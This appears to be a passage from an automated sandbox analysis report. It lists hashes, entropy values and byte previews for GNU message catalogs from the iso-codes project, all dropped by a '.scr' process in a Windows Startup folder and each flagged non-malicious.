                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Territori Brit\303\240nic Ant\303\240rtic'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2865
                                                                                                    Entropy (8bit):5.20922257347663
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3QdBp3ua+vGqIfdvqN5CoUqDofXn3bb9NascIX:rLvQ5ea+yaCo5Dofbb9NrX
                                                                                                    MD5:62F4709293703EC953ADE74E7DFD2C7D
                                                                                                    SHA1:25794DD73CF7CB0B97FA77F64A59C39D90C119A3
                                                                                                    SHA-256:AC4ECA2AEFDC1D1E7D8CFFC35C2C1901EEC6A005B36EAB0FBBB849DEBC09FC84
                                                                                                    SHA-512:634824E2D3A23844829AAC65D9788F5B4666862930EDBD225535935C65B7920685825E00AD019C057DE90279722002C212855F4F9AEC801BA5C47D797C41B1D7
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................+.......0...........)...3...B.......v.......~...................*.......)....... ...........1.......H.......V.......c.......y...........(.......................................1.......4...8.......m...#...............7.......-....................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 172 messages, Project-Id-Version: iso_4217 'Afgani'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9059
                                                                                                    Entropy (8bit):4.953593939817488
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:b3mwTZ/p5MWN9vq6K0v2LC/5TNqzE96iNNufjEk:b3JF/p5MWzqD0vUU5TNqzE9xN6jEk
                                                                                                    MD5:4CCB5B1E7599B534AE9FBD68C1386879
                                                                                                    SHA1:C330D67F7B6115F6640A961EACC5CFD32F60A4FD
                                                                                                    SHA-256:7FC5B29D47580C476E7E3A0466C1249E273498DAD208C79D65F2D5F7993BEB5C
                                                                                                    SHA-512:67FC67A36ECB0BEDF65A90F4105CBAB941EAFC2E197A80C8779A09674CF60B2A310B07F730B9EE903FA6654DFDE366ED1701E35EABFB7AC966ACAFEA4D541F42
                                                                                                    Malicious:false
                                                                                                    Preview:................|...............p.......q.......y...............................................................................................".......0.......A.......K...1...]...3...................................................................%.......7.......G.......]...0...j.......................................................................................$.......*.......9.......?.......N.......S.......i.......x...............................................................................................................$.......,.......:.......G.......T.......`.......p.......................................................................................................................................................,.......>.......N.......[.......h.......x...............................................................................................+.......;.......C.......R.......\.......c.......m.......~.......................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 583 messages, Project-Id-Version: iso_639-3 '' Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25765
                                                                                                    Entropy (8bit):4.943639742131427
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:TYbOlsoYXLR0UOm2aZJDYfNayNprlqDjynXNrsY89tvYnmVQ3S2b8j4heP1AsfAh:8LJJ0FayNQjW5yY/JlQ6sfA
                                                                                                    MD5:E9F07C5551652722084BB1774DCABABF
                                                                                                    SHA1:8F915A01E13551FE29B5639C0B3CFA7FFD0B34D0
                                                                                                    SHA-256:62BF4D79C4D291A5CDC925208237AA8A43912DDD1491FCD689F9AD594008CE54
                                                                                                    SHA-512:0A97CF4880B43AA29DE626B6BCB1A67E106BEA1BD3AE3D53AF16B3D5200506AA167C54617F7D1C80BBF74A2459E514133634B6B2B4FF67EF62389DFDFF44BDD6
                                                                                                    Malicious:false
                                                                                                    Preview:........G.......T........$.......0.......0.......0.......0.......0.......0.......1.......1.......1.......1......%1......,1......51......?1......O1......_1......d1......i1......o1......s1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......2.......2.......2.......2......#2......'2......12......?2......E2......L2......S2......W2......\2......q2......x2.......2.......2.......2.......2.......2.......2.......2.......2.......2.......2.......2.......2.......3.......3.......3.......3......"3......(3....../3......53......B3......O3......U3......[3......i3......x3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......4.......4.......4.......4......(4......24......;4......Q4......f4......l4......r4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......5......$5......-5......95......A5......H5......P5......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 201 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\320\263I\320\260\320\275\320\270\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10819
                                                                                                    Entropy (8bit):5.079637628519295
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:7ufrvcUc8uplfKTD0agJ8kutheKjR1xGfgKE/fpn2krWyJw3tMW4bLzay+fTPDYi:qT1c/plC/DgJ8kuXeK38gXR2kCykMW86
                                                                                                    MD5:3DDDA5720AAB13AA130370C06FBA9240
                                                                                                    SHA1:DDF466545A5F8CFF4CE9EE9F43698BEF82627AFA
                                                                                                    SHA-256:472F0B1F865A9A68871926851314361A8EFF6ECCF93D1DE8C735CCA27B00BAB6
                                                                                                    SHA-512:BE7A009528DAEE3328C7BDDD39B5CDF80F6EE6FFFEAB48519AEBB51B78F2A6AD5A8F0AC4937A0BF09DE30C62C85C00B6EA044D53DD1C73EB1FFFD418C2918E7D
                                                                                                    Malicious:false
                                                                                                    Preview:................d.............................................................................../.......9.......A.......G.......Q.......Y.......d.......l.......w.......................................................................................................................(.......5.......=.......F.......O.......V.......e.......~.......................................................................................................................................!.......).......2.......@......._.......d.......l.......s.......................................................................................................................................................................%.......*.......2.......9.......?.......G.......M.......T......._.......e.......n.......u...............................................................................................................................................................&...............5.......>.......I.......T.......\.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 23 messages, Project-Id-Version: iso_3166-1 'Argentina'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1416
                                                                                                    Entropy (8bit):4.974896627081915
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:aeRnaAn/sEc7idl4/VAxPX3c4J9iUpz/5Nbfh5jt0UktGk/b2WXmGRfYxPX3Q9iT:aEnaBPKxPFp1dh5yUlkKjNxP3aHgW6l
                                                                                                    MD5:7495277C42B91C099277C537423F0C30
                                                                                                    SHA1:02DC94A8DC34884B065CE3BF870E90EA36471A9B
                                                                                                    SHA-256:2CA451F44793FD0BCAFD845AE0F6198C08D43C224E5F12CEBE85FF4D5CB3F7A1
                                                                                                    SHA-512:DB079B53D055804B16E3EE57D1EB7821F64A12BB573181BA5C2488ABA27EE606B65A3333B18863473EA816F0E1329F969F6E8B65ADB4534C0B8AC0A23D3E7FB1
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................#.......*.......3.......9.......X.......`.......g.......o.......t.......~...............................................................................................................................................................................!.......+.......2.......9.......B.......R.......X.......b.......i.......q........................................................................................................................................Argentina.Armenia.Austria.Brazil.Bulgaria.Chile.Federated States of Micronesia.Finland.France.Germany.Guam.Indonesia.Italy.Japan.Lithuania.Northern Mariana Islands.Peru.Philippines.Poland.Spain.United States of America.Vietnam.Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-28 02:49+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Chamorro <https://hosted.webl
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 100 messages, Project-Id-Version: iso_3166-1 '\341\216\240\341\217\253\341\216\250\341\217\202\341\217\215\341\217\226\341\217\202'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5143
                                                                                                    Entropy (8bit):5.020513038877694
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:xXqul8FzZGBYKATojbb6uAFyJIJ5CJoy/13TCywjr7woFDDQ:xBGTEb6SBBZ+x7wMQ
                                                                                                    MD5:31EBB06C99924925059928FF84F3890D
                                                                                                    SHA1:E94A8BB64DA72A2B4D581E332EA3BD03F83AF035
                                                                                                    SHA-256:74DC62FFFD7B41FC8921F5CBA536653A92036CD84A23EC503591D69BF8913FBB
                                                                                                    SHA-512:D8C0B1AE4A8B0214E565B9F0ECE2408810D780985FB0494772D70D21589228E9B2F3E942374DAF1A0BC993D6A56B82E2C694A32161F6B47DFA4477F47834CACB
                                                                                                    Malicious:false
                                                                                                    Preview:........d.......<.......\............................................................................................................................................... .......).......1.......9.......@.......F.......N.......U.......].......t.......}...............................................................................................................................................$.......+.......3.......;.......B.......L.......U.......].......e.......k.......u.......}.......................................................................................................................................................#.......*.......3.......N.......Z.......a.......j.......r.......}.......................................................................................................................".......*.......9...............'.......7.......G.......^.......k.......x.......................................................................................$.......1.......A.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 197 messages, Project-Id-Version: iso_3166-1 '\330\246\333\225\331\201\330\272\330\247\331\206\330\263\330\252\330\247\331\206'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10429
                                                                                                    Entropy (8bit):5.134656210465522
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:WbEddefyMIzMG3V4u4uRTVV6/WgP18guoImMMzYt7n3kDv49Azh:fddefym+d4uRRY/WgP6gurKHcI
                                                                                                    MD5:8EAB73F636BBAA8438798B7952D41BDA
                                                                                                    SHA1:73156A66173AD405973411A05777F18F9A275CCA
                                                                                                    SHA-256:F821B4E5DB984E984A7942FABAB40A72AFD5F8220BAF09BFAC2584E4C0E3C272
                                                                                                    SHA-512:3EBDF9B1B288894832F1AE64F25B10A69E3456859A4E1844D982F1B95528B1F672DC2A89538AAAEC1AF21C801C2E61E9A826BC19499F1C91C7C158CEFB94EB87
                                                                                                    Malicious:false
                                                                                                    Preview:................D.......l...............................................................................................................................................(.......1.......9.......A.......H.......N.......V.......].......e.......|...............................................................................................................................*.......2.......7.......>.......M.......U.......^.......g.......z...............................................................................................................................".......,.......3.......;.......E.......L.......Z.......a...!...g...............................................................................................................................................%.......,.......7.......>.......F.......N.......V.......\.......j.......t...............................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 390 messages, Project-Id-Version: iso_3166-1 'Af\304\237anistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21581
                                                                                                    Entropy (8bit):5.09154225688461
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:yn9wKnsOq/ImCn6tAObjj5wsOP4YGCAjtuLawix0i658:yOKrII7n69XmsOP4YGCAj5xm58
                                                                                                    MD5:022A4109C7932409B727C83C2BDF6A5C
                                                                                                    SHA1:5DE03F3579372C4FCCEA7A84AEBD5CF2C2996949
                                                                                                    SHA-256:9A2A3892C0E03F7BE4019BF7E5BEEFCF0BCF48B5FC5CDDDBE276249A81E3AFBF
                                                                                                    SHA-512:AB95C6A6D45BC572090BD28D0336723DDD39B2D5246F6A977010BAA49587C34DAD586149A98C8BEA58F80FF231ECFCE5AE321B6AA45AD86D7FA80BB3775B07F5
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|........ ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!......$!......7!......?!......E!......O!......W!......b!......j!......r!......}!.......!.......!.......!.......!.......!.......!.. ....!.......!.......!.......!.......!......."......."....../"......F"......X"......a"......n"......v".......".......".......".......".......".......".......".......".......".......".......".......#..,.../#......\#......d#..%...j#.......#.......#.......#.......#.......#.......#.......#..%....#..,....$.."...-$..*...P$......{$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%......%%..'...3%..$...[%.......%.......%.......%.......%.......%.......%.......&.......&.......&......(&......8&......T&......Z&......l&......s&......{&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......'.......'..!...''......I'......['......y'.......'..0....'......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 75 messages, Project-Id-Version: iso_3166-2 'Alabama'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3684
                                                                                                    Entropy (8bit):4.817438072960845
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:2ftOFXtvpPDVWiVbG31hBla6/Wj6aGcjk16+CylaE:2fto9tDYi83Oe4jklCXE
                                                                                                    MD5:5106647D66799660ADB5A8C355B3B0A6
                                                                                                    SHA1:F8B2F49ED9A6A765A683CE9EB46A876D954BFCD2
                                                                                                    SHA-256:3D587387DD639A8923D0E333808B0DE5934F1AE149AC9DC64B80145574F92D29
                                                                                                    SHA-512:46BF61E277A240EDF46DC51336B3CC3460F4EBEFA7B7ECDF53F5805534CE6FA9E5C152EC1412E8CA8F4584C60ABE87D28D970FA9469041124191C24F6B8D7A2B
                                                                                                    Malicious:false
                                                                                                    Preview:........K.......t...e...........`.......a.......i.......p.......x.......................................................................................................................................!.......)...............5.......>.......H.......S.......Y.......^.......g.......r.......{...............................................................................................................................!...............G.......S.......X.......a.......i.......p.......}...........................................................................$................... .......(.......1.......<.......J.......T.......\.......b.......i.......q.......x.......................................................................................................................................".......+.......3.......8.......?.......H.......R.......^.......d.......i.......r.......{.......................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\304\260ngiliz Antarktika B\303\266lgesi'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2773
                                                                                                    Entropy (8bit):5.335647750340985
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADIs/3dpZNRvGqIfdvqNuoU5o8Sfr+gmIMFpzdQ:qDh/zjRyBodN+g4pG
                                                                                                    MD5:322EB120F5ECE4FBFB4DA3D0653D827D
                                                                                                    SHA1:5D0AFC552848B188860D6E2084F9500E3DCBE520
                                                                                                    SHA-256:EBDB3CF6FCACB37E6EE537CFA0F15EDF90BC183978EB57A08FE4F75E998C5196
                                                                                                    SHA-512:7FBA42036A92D165D125332172723779C8DEBDE449661AF2A350B0674B410232216CE2FD594F3E91C478A498FE426CE58A56C9DE02EA0413D9449FA8D83C7904
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...........................$...................4...0...Q...........................................*...........................:.......L.......\.......o...........$.......................................3.......,...).......V.......q..........."....................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 6431 messages, Project-Id-Version: iso_639-3 ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):256161
                                                                                                    Entropy (8bit):5.161399127267561
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:eF5hsDF3D7IFbZGp2/bQON1r6/XpTF9EJXQHffphW2nC2TUFD:eKgV/zDr6S+HZ/UD
                                                                                                    MD5:94B603095932221B9B1F642C4C73E0D5
                                                                                                    SHA1:D5057CAA882BF27422ADC88143DCF00E419F44E4
                                                                                                    SHA-256:837E802D1856CC8E4F33EF50839D1C338E0E640C4A05DD254D4E47BDB14AB086
                                                                                                    SHA-512:98E455110BDA8B4BE650D449F3EB9B18B0F7DAB7D7D0EB97DEDE2BD8EEE45D365D31F4B470EDE0C6468E3E329F5EFBCBA1F8D56F7E289445E845BFC328E1F961
                                                                                                    Malicious:false
                                                                                                    Preview:.....................!.......... .......!.......*.......4.......?.......D.......K.......Q.......W.......c.......k.......p.......u.......{.......................................................................................................................................................................................+.......:.......C.......I.......X.......^.......e.......j...............................................................................................................................................................................#.......,.......6.......>.......F.......L.......Z.......`.......e.......k.......r.......v.......{...............................................................................................'.......-.......7.......A.......H.......M.......U.......Z.......a.......g.......o.......v.......~.......................................................................................................................................................#.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 161 messages, Project-Id-Version: iso_15924 'Afaka'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9003
                                                                                                    Entropy (8bit):5.15675535314221
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:NbjAMWh3Goh1oBY2kcO0oVrG1BOtu9AuTONfYqrmQ4jIpjeKqSa5hWo1l3zuvsQ9:VAPtgWHcZ4Vnb4j2j+Sa5hW8GIbxw
                                                                                                    MD5:E36ACC7079DF1C94366E01F5E3287F3E
                                                                                                    SHA1:9DBE5777A81E3E269DDF96858FCCAA7BA73E6B7B
                                                                                                    SHA-256:1875C54E1E1E459215E1792EC99B6E7AB969AC78524F53B58A1DD3311E0F587F
                                                                                                    SHA-512:47AE429EA85D8D9DEA71B04CFE5004C9B837BD5FEF6834B5E568A931553CC3A65939ADE43171D6E94086430F03673466D37B1B52F12F2025804EF65022D2F2C6
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,...............................................................................................................!.......*.......1.......9.......B.......H.......O.......V.......[.......d.......j...........................................................&...........0.......A...(...U.......~.......................................................................................................1.......J.......d.......~...................................................&...............4...F.......{...........................................................................#...........................".......&.......,.......D.......[.......j.......p.......y...............................................................................................".......7.......F...(...P.......y...................-.......................................#.......".......)...3.......].......h.......t................................................................................... ...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afgh\303\241nist\303\241n'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24094
                                                                                                    Entropy (8bit):5.14910719344548
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosuFI8MKXnMp91bP46nbjz5wsWP48WAINiZGYgOBhhmrIVBk/dr7Zbk:0oxCxKXMp91748fmsWP48WAIy10aBk0
                                                                                                    MD5:F5AEC72FE1B277794B65DBC64FF13A6D
                                                                                                    SHA1:EFF987579017390A0A0BDBAA53B67CBC43530A82
                                                                                                    SHA-256:006B75C1AD38809AB490B2B0E72876E2DCA14DBF61CE263EB0932F1D8BF3E602
                                                                                                    SHA-512:BC7043B6BAD813366F42CCF4F09CC2EC7ACB81E3A8176722904E487BA8FE55A5940C2259C4D050C135142D8B09BDB0FB9651787B280A53ECB362BEA1A2495DDC
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 200 messages, Project-Id-Version: iso_3166-2 'Alabama'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9150
                                                                                                    Entropy (8bit):4.965049889517165
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:+PHCiesLHtSQPQlxmNgSsyL97cFvKsVTJcu6GvtT9QhW2vKstrLH:inesbtfPQvmNjtJ7YKEkQRQ86Kyv
                                                                                                    MD5:46DCA636D02640D52A7A74DF0FE0BBA9
                                                                                                    SHA1:C772A16D04F76153DC160CB4DE787E5E1F5B5F50
                                                                                                    SHA-256:356314CE93C5B3F8A729A6BC2A265643EF8774C7D4AF6AA0B5891B35809E6A08
                                                                                                    SHA-512:2ACCF390B268C3BD6123AAFDF34B478CF1C3B691075A27CB555C5CC60BF03243B22B1CC6B0FF1DF184859F3F5BDE5FB5571FF0E238911670B53E2FA4916B65F8
                                                                                                    Malicious:false
                                                                                                    Preview:................\...............................................................................................,.......3.......<.......C.......J.......R.......[.......n.......w....................................................................................................................... .......)......./.......8.......>.......S.......\.......g.......n.......w....................................................................................................................................... .......(.......;.......L.......`.......h.......o...............................................................................................................................,.......6.......<.......B.......G.......P.......[.......i.......r.......|.......................................................................................................................1.......7.......?.......N.......[.......t.......................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Britsk\303\251 teritorium v Antarktid\304\233'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2879
                                                                                                    Entropy (8bit):5.35250191689412
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3FslV5URaQ+vGqIfdvqN5CoUGAl3yw/b/Ne657WTptiyhq5V5dnYl:rLvFqqRaQ+yaCo3AlxD/46tWTp8vHI
                                                                                                    MD5:EFFAD64583D1FD29D4C145B97928D65F
                                                                                                    SHA1:069F4D3A5A87009D4B9CB74313BC7C16E66106FB
                                                                                                    SHA-256:5E5A46A1C56525C88913A1EB387D72AE2DE5BDB5DF5E3A950CF03A2E54C133C0
                                                                                                    SHA-512:1CD9114D90FF21FCA804AEBAA83CAFDB6946FB35CF617E1C6498EB8F2614A0FCB234BAFC167619A55EE4040A5DEDE4BB0AFB0663059D133CAEACEFD2C12D36F1
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................!.......%......./...........7...:...R...................................#.......-.......!...$.......F.......e.......u...........................*...................................!...)...2...1...\........... ...............&.......4.........../........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 173 messages, Project-Id-Version: iso_4217 'Z\303\272\304\215tovac\303\255 jednotka Africk\303\251 rozvojov\303\251 banky'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9477
                                                                                                    Entropy (8bit):5.108213300568377
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:zPe0bblojNYw1aSKdFGyNi4QTNbtKMJtpkS2SILC3KmSWKwF5jkmSXEjKUnakSXf:zPnbOKaaSMFPqPK0vMLC/fF5IRUdU
                                                                                                    MD5:0B3B9DF4B4E95B7DDC4CA9E0E1D2F944
                                                                                                    SHA1:59D7D9EE40D56576E7187A1A917421D20CC1A1A5
                                                                                                    SHA-256:C70C7F049AA39B3AFF9A6CD88D1E56B7983749B58E024E2B5287351DC35B4D99
                                                                                                    SHA-512:C6C8189476DDAE146B1AF313A074D54A91114C32FFFC4C88343EA68B115A18DAA2C0E14546DC0071548F7E6FDCBA86E28CB6193C431DB13B719422523806FA6D
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................................................................)...............5.......E.......V.......d.......u...1.......3.......9.......7...........W.......f.......t...................................................................0.........../.......>.......M.......].......n.......z...............................................................................................................-.......2.......I.......U.......\.......g.......w.......|.......................................................................................................$.......)...............<.......C.......H.......P.......U.......d.......h.......p.......v.......................................................................................................%.......+.......:.......I.......g.......z.......................................................................................................*.......3.......B.......G.......S.......[.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 335 messages, Project-Id-Version: iso_639-3 'abchazaj\305\241tina'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14412
                                                                                                    Entropy (8bit):4.78873839494385
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:C8qYCE+3AvUr990Iombx1a1lcQfFMrsatBmTpwH6LgH35iUmWk:CjEdq92GbfaNXgz3Q1
                                                                                                    MD5:4FABF2CC27B7CAB827CF3E28DC60F25C
                                                                                                    SHA1:9EC1C47D5B8AAF7D939D8FB150C9EAD20C57AC3F
                                                                                                    SHA-256:4B36598766764062826F1B2894088349A50097AB7BDE3EBA1C690B6E2ED38E97
                                                                                                    SHA-512:5C10F52BCE38925F7591DCB2C3A11C2E620F53E4C4F12187AD41A0AD2FD5377C15E87446D111D12BF66657674E863251C00BBF647A74E131A5F31D53BA607E3D
                                                                                                    Malicious:false
                                                                                                    Preview:........O...............................................$.......*.......2.......7.......@.......J.......O.......X.......a.......g.......o.......v.......}............................................................................................................................................................... .......(.......0.......5.......<.......E.......O.......V.......^.......d.......l.......t.......}.......................................................................................................................................................%.......,.......3.......:.......C.......I.......P.......V.......\.......b.......k.......p...............................................................................................................................................................................$.......-.......4.......?.......E.......O.......V.......\.......u...............................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 61 messages, Project-Id-Version: iso_639-5 'afro-asijsk\303\251 jazyky'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3971
                                                                                                    Entropy (8bit):4.947647064935191
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:5q3GMhq7n4SYzbOifIOYiayDu3KK0UL30ULf+qadXQvhr/CUJhdLyiaiJn2a0zc4:0WMIn4lSiw9R0E0C+fIC0hdz32SpEb0W
                                                                                                    MD5:0BCF1D6F04A890C4E84C7E8613BB5061
                                                                                                    SHA1:9D42C2654E47CFD871C49BBB7E70F3A58B63366D
                                                                                                    SHA-256:52CD5DB64C465BF159222BB369E16026D8A1537DE2FB12227AA958472C022A59
                                                                                                    SHA-512:294D3D7C18E461661EDF93EB6744F4A13D7D132A6CC53307160DEE273AA3865CC3C895ACE682D40D28204D09825EEE763B213AE65360E8F00526C666EC92DF16
                                                                                                    Malicious:false
                                                                                                    Preview:........=...........S...........8.......9.......P.......e.......v.......................................................................!.......2.......C.......W...!...h...................%...........................................&.......4.......D.......\.......n.......................................................................................:.......Q.......q...............................................................................).......:.......K.......].......o.......}...........................9...........................".......3.......D.......S.......j.......}...................................................................$...!.......F.......V...7...r...............................................................+.......=.......P.......a.......t..................................................................."...........B.......T.......e.......x...............................................................................+.......?.......O.......[.......m.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 94 messages, Project-Id-Version: iso_3166-1 'Afganist\303\263n'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4448
                                                                                                    Entropy (8bit):4.918089101393498
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:jVgr4t+/ibPEKIf1QzygPjYhDoAu1Cy7L8X1wHjLuWW80Jt:ht+/iIBQrPGDoAiVHjLD07
                                                                                                    MD5:2DD36D1B83285DBC46F11A82A5D4BE8E
                                                                                                    SHA1:555862EFA111E54A08E9475B4B1A8530C899CD2A
                                                                                                    SHA-256:3BA545C0D8E22013BA276710D931EAEA7B03457D0DAE3FF61D8723208C291DE4
                                                                                                    SHA-512:67AC88F455B7979C92FC39332134EF33F034BC75B047F7132F476906D4D3847AAD4C63E8C3D2E7ACC71C88D0C7B6D630F16373954615DD28FD9A5FA22C38A612
                                                                                                    Malicious:false
                                                                                                    Preview:........^.......................................................................'......./.......:.......B.......M.......U.......].......d.......{...............................................................................................................................................................................'...............4.......:.......A.......L.......S.......^.......e.......m.......u....................................................................................................................................................... .......).......D.......P.......W.......`.......f.......n.......y...............................................................................................................................................5.......@.......H.......N.......a.......m.......x...............................................................................................................!.......(...............:.......@.......S.......].......c.......l.......w.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
